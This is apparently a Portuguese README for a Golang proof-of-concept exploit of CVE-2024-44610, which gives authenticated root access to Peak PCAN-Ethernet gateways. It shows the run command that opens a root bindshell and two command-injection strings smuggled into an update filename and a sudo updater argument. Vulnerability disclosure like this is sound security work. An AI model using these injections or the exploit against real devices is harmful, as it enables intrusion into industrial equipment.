
CVE-2024-44610: Exploração remota autenticada de root em gateways Peak PCAN-Ethernet CAN-(FD)
Este repositório contém um exploit de Prova de Conceito (PoC) que executa código como root em gateways Peak Ethernet. Requer que você saiba as credenciais da interface web.
O fornecedor forneceu rapidamente firmware corrigido:
Compile o programa usando Golang e execute da seguinte forma:
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
Se o exploit for bem-sucedido, um bindshell será iniciado no dispositivo como root. Você pode ver duas capturas de tela no final desta página.
As opções têm o seguinte significado:
Embora a versão não FD também seja vulnerável, isso tem pouca importância prática, já que esses dispositivos não implementam atualizações de firmware assinadas e, portanto, você poderia simplesmente enviar seu próprio firmware modificado.
Duas vulnerabilidades de injeção de comando shell são usadas:
É possível incluir um comando shell no nome do arquivo do pacote de atualização enviado para a interface web, por exemplo:
test';ping 1.1.1.1;'.raucb
O comando será executado como o usuário www-data, que executa o servidor web. O nome do arquivo precisa ter a extensão correta (tar ou raucb, dependendo do dispositivo).
O binário internamente executa system no nome do arquivo fornecido, desde que ele exista. Pode ser explorado da seguinte forma:
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
Como este binário pode ser executado via sudo, é possível executar o comando como root.
Dispositivo FD:

Dispositivo não FD:
